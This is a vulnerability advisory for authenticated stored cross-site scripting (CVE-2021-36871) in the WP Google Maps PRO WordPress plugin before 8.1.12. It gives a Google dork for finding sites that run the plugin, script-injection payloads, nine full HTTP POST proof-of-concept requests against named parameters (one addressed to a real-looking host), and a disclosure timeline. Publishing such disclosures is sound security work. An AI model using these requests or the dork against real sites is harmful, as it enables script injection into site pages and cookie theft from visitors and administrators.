[+] :: VULNERABILITY: WP Google Maps PRO Add-on Plugin < 8.1.12 - Authenticated Persistent XSS
[+] :: GOOGLE DORK: inurl:/wp-content/plugins/wp-google-maps-pro/
[+] :: DATE: 2021-06-11
[+] :: SECURITY RESEARCHER: Visse [ https://visse.ru ]
[+] :: VENDOR: WP Google Maps [ https://www.wpgmaps.com ]
[+] :: SOFTWARE VERSION: < 8.1.12
[+] :: SOFTWARE LINK: https://www.wpgmaps.com/purchase-professional-version/
[+] :: CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
[+] :: CWE: CWE-79
[+] :: CVE: CVE-2021-36871
[i] == [ Info: ]
An Authenticated Persistent XSS vulnerability was discovered in the WP Google Maps PRO Add-on Plugin through v8.1.12 for WordPress.
Vulnerable parameter(s): &dataset_name, &title, &description, &link, &names[], &icons[], &attributes[] (x2), &wpgmaps_marker_category_name.
[?] == [ Code: ]
-
[$] == [ Impact: ]
Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
[%] == [ Payloads: ]
<script>alert(origin)</script>
<script>alert(document.domain)</script>
[!] == [ PoC #1 | Authenticated Persistent XSS | Maps > Heatmaps > &dataset_name: ]
POST /wp-json/wpgmza/v1/heatmaps/ HTTP/2
Host: blackcore.ru
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: f0f10b488b
X-Requested-With: XMLHttpRequest
Content-Length: 532
id=-1&map_id=1&dataset_name=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&gradient=%5B%22rgba(0%2C+0%2C+255%2C+0)%22%2C+%22rgba(0%2C+255%2C+255%2C+1)%22%2C+%22rgba(0%2C+255%2C+0%2C+1)%22%2C+%22rgba(255%2C+255%2C+0%2C+1)%22%2C+%22rgba(255%2C+0%2C+0%2C+1)%22%5D&opacity=0.5&radius=20&dataset=
[!] == [ PoC #2 | Authenticated Persistent XSS | Maps > Markers > &title: ]
POST /wp-json/wpgmza/v1/markers/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e7db87e0a9
X-Requested-With: XMLHttpRequest
Content-Length: 1073
id=-1&map_id=1&title=%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description=
[!] == [ PoC #3 | Authenticated Persistent XSS | Maps > Markers > &link: ]
POST /wp-json/wpgmza/v1/markers/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e7db87e0a9
X-Requested-With: XMLHttpRequest
Content-Length: 1073
id=-1&map_id=1&title=PoC&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description=
[!] == [ PoC #4 | Authenticated Persistent XSS | Maps > Markers > &description: ]
POST /wp-json/wpgmza/v1/markers/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e7db87e0a9
X-Requested-With: XMLHttpRequest
Content-Length: 1073
id=-1&map_id=1&title=PoC&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
[!] == [ PoC #5 | Authenticated Persistent XSS | Custom Fields > Name > &names[]: ]
POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483
action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&icons%5B%5D=&attributes%5B%5D=&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2
[!] == [ PoC #6 | Authenticated Persistent XSS | Custom Fields > Icon > &icons[]: ]
POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483
action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&attributes%5B%5D=&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2
[!] == [ PoC #7 | Authenticated Persistent XSS | Custom Fields > Attributes > Name > &attributes[]: ]
POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483
action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=&attributes%5B%5D=%7B%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%3A%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%7D&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2
[!] == [ PoC #8 | Authenticated Persistent XSS | Custom Fields > Attributes > Value > &attributes[]: ]
POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483
action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=&attributes%5B%5D=%7B%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%3A%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%7D&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2
[!] == [ PoC #9 | Authenticated Persistent XSS | Categories > Category Name > &wpgmaps_marker_category_name: ]
POST /wp-admin/admin.php?page=wp-google-maps-menu-categories HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 281
real_post_nonce=337841e1c8&wpgmaps_marker_category_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&upload_default_category_marker=&category_image=&parent_category=0&wpgmaps_marker_category_priority=8&assigned_to_map%5B%5D=ALL&wpgmza_save_marker_category=Save+Category+%C2%BB
[*] == [ Timeline: ]
2021.06.03 - WP Google Maps PRO Add-on Plugin v8.1.11 released
2021.06.11 - Multiple XSS issues discovered
2021.06.12 - Vendor contacted
2021.06.15 - WP Google Maps PRO Add-on Plugin v8.1.12 released
[@] == [ Contacts: ]
Website: visse.ru
LinkedIn: @visse
Medium: @visse
HackerOne: @visse
====================================================================
= Want money for vulnerabilities in the WordPress ecosystem? [Y/n] =
= ---------------------------------------------------------------- =
= [ Yes: ] Join the $ hunt here - https://patchstack.com/red-team/ =
= [ No: ] Hunter, think twice and don't miss the chance to gain $ =
====================================================================
